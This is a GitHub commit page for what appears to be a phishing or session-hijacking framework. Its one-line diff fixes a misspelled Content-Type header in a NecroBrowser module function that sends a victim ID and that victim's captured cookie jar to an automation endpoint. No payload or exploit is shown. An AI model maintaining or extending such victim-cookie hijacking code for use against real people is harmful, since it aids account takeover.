Skip to content

Commit

Permalink
fix necrobrowser wrong content-type
Browse files Browse the repository at this point in the history
  • Loading branch information
ohpe committed Mar 13, 2024
1 parent 1631e41 commit 21bfe26
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion module/necrobrowser/necrobrowser.go
Original file line number Diff line number Diff line change
Expand Up @@ -232,7 +232,7 @@ func (module *Necrobrowser) Instrument(victimID string, cookieJar []db.VictimCoo
module.Info("instrumenting %s", tui.Bold(tui.Red(victimID)))
client := resty.New()
resp, err := client.R().
SetHeader("Content-LandingType", "application/json").
SetHeader("Content-Type", "application/json").
SetBody(newRequest).
Post(module.Endpoint)

Expand Down

0 comments on commit 21bfe26

Please sign in to comment.